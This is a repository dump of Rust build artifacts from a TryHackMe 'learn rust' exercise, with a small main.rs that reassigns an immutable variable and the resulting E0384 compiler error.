-------------------------------------------------------------------------------- 1 | /root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_1/target/rls/debug/deps/rust_task_4_question_1-62f166f2afadf485.rmeta: src/main.rs 2 | 3 | /root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_1/target/rls/debug/deps/rust_task_4_question_1-62f166f2afadf485.d: src/main.rs 4 | 5 | src/main.rs: 6 | -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-3o4k4wj4hqxck/s-fsprhycz1v-lgicwf-1cnlbur24auhj/dep-graph.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-3o4k4wj4hqxck/s-fsprhycz1v-lgicwf-1cnlbur24auhj/dep-graph.bin -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-3o4k4wj4hqxck/s-fsprhycz1v-lgicwf-1cnlbur24auhj/query-cache.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-3o4k4wj4hqxck/s-fsprhycz1v-lgicwf-1cnlbur24auhj/query-cache.bin -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-3o4k4wj4hqxck/s-fsprhycz1v-lgicwf-1cnlbur24auhj/work-products.bin: -------------------------------------------------------------------------------- 1 | RSIC1.47.0 (18bf6b4f0 2020-10-07) -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-3o4k4wj4hqxck/s-fsprhycz1v-lgicwf.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-3o4k4wj4hqxck/s-fsprhycz1v-lgicwf.lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-3o4k4wj4hqxck/s-fspsmrz9ss-1w0426u-working/dep-graph.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-3o4k4wj4hqxck/s-fspsmrz9ss-1w0426u-working/dep-graph.bin -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-3o4k4wj4hqxck/s-fspsmrz9ss-1w0426u-working/query-cache.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-3o4k4wj4hqxck/s-fspsmrz9ss-1w0426u-working/query-cache.bin -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-3o4k4wj4hqxck/s-fspsmrz9ss-1w0426u-working/work-products.bin: -------------------------------------------------------------------------------- 1 | RSIC1.47.0 (18bf6b4f0 2020-10-07) -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-3o4k4wj4hqxck/s-fspsmrz9ss-1w0426u.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-3o4k4wj4hqxck/s-fspsmrz9ss-1w0426u.lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-phub2y83ca2l/s-fsprhyafrf-dls0k7-2nhyc15yhnem5/dep-graph.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-phub2y83ca2l/s-fsprhyafrf-dls0k7-2nhyc15yhnem5/dep-graph.bin -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-phub2y83ca2l/s-fsprhyafrf-dls0k7-2nhyc15yhnem5/query-cache.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-phub2y83ca2l/s-fsprhyafrf-dls0k7-2nhyc15yhnem5/query-cache.bin -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-phub2y83ca2l/s-fsprhyafrf-dls0k7-2nhyc15yhnem5/work-products.bin: -------------------------------------------------------------------------------- 1 | RSIC1.47.0 (18bf6b4f0 2020-10-07) -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-phub2y83ca2l/s-fsprhyafrf-dls0k7.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-phub2y83ca2l/s-fsprhyafrf-dls0k7.lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-phub2y83ca2l/s-fspsogk8k0-ir08ii-working/dep-graph.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-phub2y83ca2l/s-fspsogk8k0-ir08ii-working/dep-graph.bin -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-phub2y83ca2l/s-fspsogk8k0-ir08ii-working/query-cache.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-phub2y83ca2l/s-fspsogk8k0-ir08ii-working/query-cache.bin -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-phub2y83ca2l/s-fspsogk8k0-ir08ii-working/work-products.bin: -------------------------------------------------------------------------------- 1 | RSIC1.47.0 (18bf6b4f0 2020-10-07) -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-phub2y83ca2l/s-fspsogk8k0-ir08ii.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_1/target/rls/debug/incremental/rust_task_4_question_1-phub2y83ca2l/s-fspsogk8k0-ir08ii.lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/Cargo.lock: -------------------------------------------------------------------------------- 1 | # This file is automatically @generated by Cargo. 2 | # It is not intended for manual editing. 3 | [[package]] 4 | name = "rust_task_4_question_2" 5 | version = "0.1.0" 6 | -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "rust_task_4_question_2" 3 | version = "0.1.0" 4 | authors = ["Pamela Hrituc "] 5 | edition = "2018" 6 | 7 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 8 | 9 | [dependencies] 10 | -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/src/main.rs: -------------------------------------------------------------------------------- 1 | fn main() { 2 | let x = 5; 3 | println!("The value of x is: {}", x); 4 | x = 5; 5 | println!("The value of x is: {}", x); 6 | } 7 | -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/.rustc_info.json: -------------------------------------------------------------------------------- 1 | {"rustc_fingerprint":1271388184313950870,"outputs":{"1164083562126845933":["rustc 1.47.0 (18bf6b4f0 2020-10-07)\nbinary: rustc\ncommit-hash: 18bf6b4f01a6feaf7259ba7cdae58031af1b7b39\ncommit-date: 2020-10-07\nhost: x86_64-unknown-linux-gnu\nrelease: 1.47.0\nLLVM version: 11.0\n",""],"4476964694761187371":["___\nlib___.rlib\nlib___.so\nlib___.so\nlib___.a\nlib___.so\n/root/.rustup/toolchains/stable-x86_64-unknown-linux-gnu\ndebug_assertions\nproc_macro\ntarget_arch=\"x86_64\"\ntarget_endian=\"little\"\ntarget_env=\"gnu\"\ntarget_family=\"unix\"\ntarget_feature=\"fxsr\"\ntarget_feature=\"sse\"\ntarget_feature=\"sse2\"\ntarget_os=\"linux\"\ntarget_pointer_width=\"64\"\ntarget_vendor=\"unknown\"\nunix\n",""]},"successes":{}} -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/debug/.cargo-lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_2/target/debug/.cargo-lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/debug/.fingerprint/rust_task_4_question_2-3385faec9c38c8e2/invoked.timestamp: -------------------------------------------------------------------------------- 1 | This file has an mtime of when this was started. -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/debug/.fingerprint/rust_task_4_question_2-3385faec9c38c8e2/output-bin-rust_task_4_question_2: -------------------------------------------------------------------------------- 1 | {"message":"cannot assign twice to immutable variable `x`","code":{"code":"E0384","explanation":"An immutable variable was reassigned.\n\nErroneous code example:\n\n```compile_fail,E0384\nfn main() {\n let x = 3;\n x = 5; // error, reassignment of immutable variable\n}\n```\n\nBy default, variables in Rust are immutable. To fix this error, add the keyword\n`mut` after the keyword `let` when declaring the variable. For example:\n\n```\nfn main() {\n let mut x = 3;\n x = 5;\n}\n```\n"},"level":"error","spans":[{"file_name":"src/main.rs","byte_start":20,"byte_end":21,"line_start":2,"line_end":2,"column_start":9,"column_end":10,"is_primary":false,"text":[{"text":" let x = 5;","highlight_start":9,"highlight_end":10}],"label":"first assignment to `x`","suggested_replacement":null,"suggestion_applicability":null,"expansion":null},{"file_name":"src/main.rs","byte_start":73,"byte_end":78,"line_start":4,"line_end":4,"column_start":5,"column_end":10,"is_primary":true,"text":[{"text":" x = 5;","highlight_start":5,"highlight_end":10}],"label":"cannot assign twice to immutable variable","suggested_replacement":null,"suggestion_applicability":null,"expansion":null}],"children":[{"message":"make this binding mutable","code":null,"level":"help","spans":[{"file_name":"src/main.rs","byte_start":20,"byte_end":21,"line_start":2,"line_end":2,"column_start":9,"column_end":10,"is_primary":true,"text":[{"text":" let x = 5;","highlight_start":9,"highlight_end":10}],"label":null,"suggested_replacement":"mut x","suggestion_applicability":"MachineApplicable","expansion":null}],"children":[],"rendered":null}],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror[E0384]\u001b[0m\u001b[0m\u001b[1m: cannot assign twice to immutable variable `x`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m--> \u001b[0m\u001b[0msrc/main.rs:4:5\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m2\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m| \u001b[0m\u001b[0m let x = 5;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m| \u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m-\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m| \u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m|\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m| \u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12mfirst assignment to `x`\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m| \u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12mhelp: make this binding mutable: `mut x`\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m3\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m| \u001b[0m\u001b[0m println!(\"The value of x is: {}\", x);\u001b[0m\n\u001b[0m\u001b[1m\u001b[38;5;12m4\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m| \u001b[0m\u001b[0m x = 5;\u001b[0m\n\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;12m| \u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9m^^^^^\u001b[0m\u001b[0m \u001b[0m\u001b[0m\u001b[1m\u001b[38;5;9mcannot assign twice to immutable variable\u001b[0m\n\n"} 2 | {"message":"aborting due to previous error","code":null,"level":"error","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1m\u001b[38;5;9merror\u001b[0m\u001b[0m\u001b[1m: aborting due to previous error\u001b[0m\n\n"} 3 | {"message":"For more information about this error, try `rustc --explain E0384`.","code":null,"level":"failure-note","spans":[],"children":[],"rendered":"\u001b[0m\u001b[1mFor more information about this error, try `rustc --explain E0384`.\u001b[0m\n"} 4 | -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/debug/deps/rust_task_4_question_2-3385faec9c38c8e2.d: -------------------------------------------------------------------------------- 1 | /root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/target/debug/deps/rust_task_4_question_2-3385faec9c38c8e2: src/main.rs 2 | 3 | /root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/target/debug/deps/rust_task_4_question_2-3385faec9c38c8e2.d: src/main.rs 4 | 5 | src/main.rs: 6 | -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/debug/incremental/rust_task_4_question_2-34kvhl2z8977x/s-fspszd52y7-u18go5.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_2/target/debug/incremental/rust_task_4_question_2-34kvhl2z8977x/s-fspszd52y7-u18go5.lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/.rustc_info.json: -------------------------------------------------------------------------------- 1 | {"rustc_fingerprint":1271388184313950870,"outputs":{"1164083562126845933":["rustc 1.47.0 (18bf6b4f0 2020-10-07)\nbinary: rustc\ncommit-hash: 18bf6b4f01a6feaf7259ba7cdae58031af1b7b39\ncommit-date: 2020-10-07\nhost: x86_64-unknown-linux-gnu\nrelease: 1.47.0\nLLVM version: 11.0\n",""],"4476964694761187371":["___\nlib___.rlib\nlib___.so\nlib___.so\nlib___.a\nlib___.so\n/root/.rustup/toolchains/stable-x86_64-unknown-linux-gnu\ndebug_assertions\nproc_macro\ntarget_arch=\"x86_64\"\ntarget_endian=\"little\"\ntarget_env=\"gnu\"\ntarget_family=\"unix\"\ntarget_feature=\"fxsr\"\ntarget_feature=\"sse\"\ntarget_feature=\"sse2\"\ntarget_os=\"linux\"\ntarget_pointer_width=\"64\"\ntarget_vendor=\"unknown\"\nunix\n",""]},"successes":{}} -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/CACHEDIR.TAG: -------------------------------------------------------------------------------- 1 | Signature: 8a477f597d28d172789f06886806bc55 2 | # This file is a cache directory tag created by cargo. 3 | # For information about cache directory tags see https://bford.info/cachedir/ -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/.cargo-lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_2/target/rls/debug/.cargo-lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/.fingerprint/rust_task_4_question_2-0d4288f9d45e126f/dep-test-bin-rust_task_4_question_2: -------------------------------------------------------------------------------- 1 |  src/main.rs -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/.fingerprint/rust_task_4_question_2-0d4288f9d45e126f/invoked.timestamp: -------------------------------------------------------------------------------- 1 | This file has an mtime of when this was started. -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/.fingerprint/rust_task_4_question_2-0d4288f9d45e126f/test-bin-rust_task_4_question_2: -------------------------------------------------------------------------------- 1 | f52d7344c06e7692 -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/.fingerprint/rust_task_4_question_2-0d4288f9d45e126f/test-bin-rust_task_4_question_2.json: -------------------------------------------------------------------------------- 1 | {"rustc":66165631676752942,"features":"[]","target":8084470633007283853,"profile":8341259748240011191,"path":1036222786711178230,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/rust_task_4_question_2-0d4288f9d45e126f/dep-test-bin-rust_task_4_question_2"}}],"rustflags":[],"metadata":15837698768319562253,"config":0} -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/.fingerprint/rust_task_4_question_2-9d9b49e5ccecbdc4/bin-rust_task_4_question_2: -------------------------------------------------------------------------------- 1 | ce22e9d5de050c0d -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/.fingerprint/rust_task_4_question_2-9d9b49e5ccecbdc4/bin-rust_task_4_question_2.json: -------------------------------------------------------------------------------- 1 | {"rustc":66165631676752942,"features":"[]","target":8084470633007283853,"profile":1613559695681135254,"path":1036222786711178230,"deps":[],"local":[{"CheckDepInfo":{"dep_info":"debug/.fingerprint/rust_task_4_question_2-9d9b49e5ccecbdc4/dep-bin-rust_task_4_question_2"}}],"rustflags":[],"metadata":15837698768319562253,"config":0} -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/.fingerprint/rust_task_4_question_2-9d9b49e5ccecbdc4/dep-bin-rust_task_4_question_2: -------------------------------------------------------------------------------- 1 |  src/main.rs -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/.fingerprint/rust_task_4_question_2-9d9b49e5ccecbdc4/invoked.timestamp: -------------------------------------------------------------------------------- 1 | This file has an mtime of when this was started. -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/deps/rust_task_4_question_2-0d4288f9d45e126f.d: -------------------------------------------------------------------------------- 1 | /root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/target/rls/debug/deps/rust_task_4_question_2-0d4288f9d45e126f.rmeta: src/main.rs 2 | 3 | /root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/target/rls/debug/deps/rust_task_4_question_2-0d4288f9d45e126f.d: src/main.rs 4 | 5 | src/main.rs: 6 | -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/deps/rust_task_4_question_2-9d9b49e5ccecbdc4.d: -------------------------------------------------------------------------------- 1 | /root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/target/rls/debug/deps/rust_task_4_question_2-9d9b49e5ccecbdc4.rmeta: src/main.rs 2 | 3 | /root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/target/rls/debug/deps/rust_task_4_question_2-9d9b49e5ccecbdc4.d: src/main.rs 4 | 5 | src/main.rs: 6 | -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/deps/save-analysis/rust_task_4_question_2-9d9b49e5ccecbdc4.json: -------------------------------------------------------------------------------- 1 | {"config":{"output_file":null,"full_docs":false,"pub_only":false,"reachable_only":false,"distro_crate":false,"signatures":false,"borrow_data":false},"version":"0.19.0","compilation":{"directory":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2","program":"/root/.rustup/toolchains/stable-x86_64-unknown-linux-gnu/bin/rls","arguments":[],"output":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/target/rls/debug/deps/librust_task_4_question_2-9d9b49e5ccecbdc4.rmeta"},"prelude":{"crate_id":{"name":"rust_task_4_question_2","disambiguator":[9106759868091017904,2619298059902911367]},"crate_root":"src","external_crates":[{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/src/main.rs","num":1,"id":{"name":"std","disambiguator":[7603043973503281951,6245179856538753269]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/src/main.rs","num":2,"id":{"name":"core","disambiguator":[13741360846946026623,2672266499591153283]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/src/main.rs","num":3,"id":{"name":"compiler_builtins","disambiguator":[4729845745352067521,14981637654352572000]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/src/main.rs","num":4,"id":{"name":"rustc_std_workspace_core","disambiguator":[9324331421111590993,11905740212167270908]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/src/main.rs","num":5,"id":{"name":"alloc","disambiguator":[11392341838745785002,13287300438441731562]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/src/main.rs","num":6,"id":{"name":"libc","disambiguator":[8694337109875809164,2250367951223185901]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/src/main.rs","num":7,"id":{"name":"unwind","disambiguator":[10935849247287619708,10935329660555626336]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/src/main.rs","num":8,"id":{"name":"cfg_if","disambiguator":[5583458701817410803,1770096645244614441]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/src/main.rs","num":9,"id":{"name":"hashbrown","disambiguator":[4926505318506753650,8786990194761766393]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/src/main.rs","num":10,"id":{"name":"rustc_std_workspace_alloc","disambiguator":[15262570485262297613,5690312430589388023]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/src/main.rs","num":11,"id":{"name":"rustc_demangle","disambiguator":[16900335184017598038,9051488994794742296]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/src/main.rs","num":12,"id":{"name":"addr2line","disambiguator":[528960645316233979,8037674519295179684]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/src/main.rs","num":13,"id":{"name":"gimli","disambiguator":[4483237274112351560,17959943558012528736]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/src/main.rs","num":14,"id":{"name":"object","disambiguator":[384772052184402859,1578385820564656749]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/src/main.rs","num":15,"id":{"name":"miniz_oxide","disambiguator":[12301751291607961788,16569514459755551136]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/src/main.rs","num":16,"id":{"name":"adler","disambiguator":[4223616801544016660,17489963460572122123]}},{"file_name":"/root/Documents/TryHackMe_Walkthroughs/room_learn_rust/rust_task_4_question_2/src/main.rs","num":17,"id":{"name":"panic_unwind","disambiguator":[3882963855561891520,1067502799155491607]}}],"span":{"file_name":"src/main.rs","byte_start":0,"byte_end":123,"line_start":1,"line_end":6,"column_start":1,"column_end":2}},"imports":[],"defs":[{"kind":"Mod","id":{"krate":0,"index":0},"span":{"file_name":"src/main.rs","byte_start":0,"byte_end":123,"line_start":1,"line_end":6,"column_start":1,"column_end":2},"name":"","qualname":"::","value":"src/main.rs","parent":null,"children":[{"krate":0,"index":1},{"krate":0,"index":2},{"krate":0,"index":3}],"decl_id":null,"docs":"","sig":null,"attributes":[]},{"kind":"Function","id":{"krate":0,"index":3},"span":{"file_name":"src/main.rs","byte_start":3,"byte_end":7,"line_start":1,"line_end":1,"column_start":4,"column_end":8},"name":"main","qualname":"::main","value":"fn main()","parent":null,"children":[],"decl_id":null,"docs":"","sig":null,"attributes":[]},{"kind":"Local","id":{"krate":0,"index":2147483651},"span":{"file_name":"src/main.rs","byte_start":20,"byte_end":21,"line_start":2,"line_end":2,"column_start":9,"column_end":10},"name":"x","qualname":"x$HirId { owner: DefId(0:3 ~ rust_task_4_question_2[7e61]::main[0]), local_id: 1 }","value":"i32","parent":null,"children":[],"decl_id":null,"docs":"","sig":null,"attributes":[]}],"impls":[],"refs":[{"kind":"Function","span":{"file_name":"/root/.rustup/toolchains/stable-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/std/src/macros.rs","byte_start":23436,"byte_end":23469,"line_start":96,"line_end":96,"column_start":28,"column_end":61},"ref_id":{"krate":2,"index":6304}},{"kind":"Variable","span":{"file_name":"src/main.rs","byte_start":65,"byte_end":66,"line_start":3,"line_end":3,"column_start":39,"column_end":40},"ref_id":{"krate":0,"index":2147483651}},{"kind":"Function","span":{"file_name":"/root/.rustup/toolchains/stable-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/std/src/macros.rs","byte_start":23436,"byte_end":23469,"line_start":96,"line_end":96,"column_start":28,"column_end":61},"ref_id":{"krate":2,"index":6297}},{"kind":"Variable","span":{"file_name":"src/main.rs","byte_start":73,"byte_end":74,"line_start":4,"line_end":4,"column_start":5,"column_end":6},"ref_id":{"krate":0,"index":2147483651}},{"kind":"Function","span":{"file_name":"/root/.rustup/toolchains/stable-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/std/src/macros.rs","byte_start":23436,"byte_end":23469,"line_start":96,"line_end":96,"column_start":28,"column_end":61},"ref_id":{"krate":2,"index":6304}},{"kind":"Variable","span":{"file_name":"src/main.rs","byte_start":118,"byte_end":119,"line_start":5,"line_end":5,"column_start":39,"column_end":40},"ref_id":{"krate":0,"index":2147483651}},{"kind":"Function","span":{"file_name":"/root/.rustup/toolchains/stable-x86_64-unknown-linux-gnu/lib/rustlib/src/rust/library/std/src/macros.rs","byte_start":23436,"byte_end":23469,"line_start":96,"line_end":96,"column_start":28,"column_end":61},"ref_id":{"krate":2,"index":6297}}],"macro_refs":[],"relations":[]} -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-1x6ssy8b5ff00/s-fspsshbgln-wq29rp.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-1x6ssy8b5ff00/s-fspsshbgln-wq29rp.lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-1x6ssy8b5ff00/s-fspssk2r9p-977eqz.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-1x6ssy8b5ff00/s-fspssk2r9p-977eqz.lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-1x6ssy8b5ff00/s-fspssl0t1w-1n2huy6.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-1x6ssy8b5ff00/s-fspssl0t1w-1n2huy6.lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-1x6ssy8b5ff00/s-fspsslgezi-4x295y.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pamhrituc/TryHackMe_Writeups/df0a6925dabaaac077350414598c9865dfea8d3e/room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-1x6ssy8b5ff00/s-fspsslgezi-4x295y.lock -------------------------------------------------------------------------------- /room_learn_rust/rust_task_4_question_2/target/rls/debug/incremental/rust_task_4_question_2-1x6ssy8b5ff00/s-fspssluejc-azjd05.lock: -------------------------------------------------------------------------------- 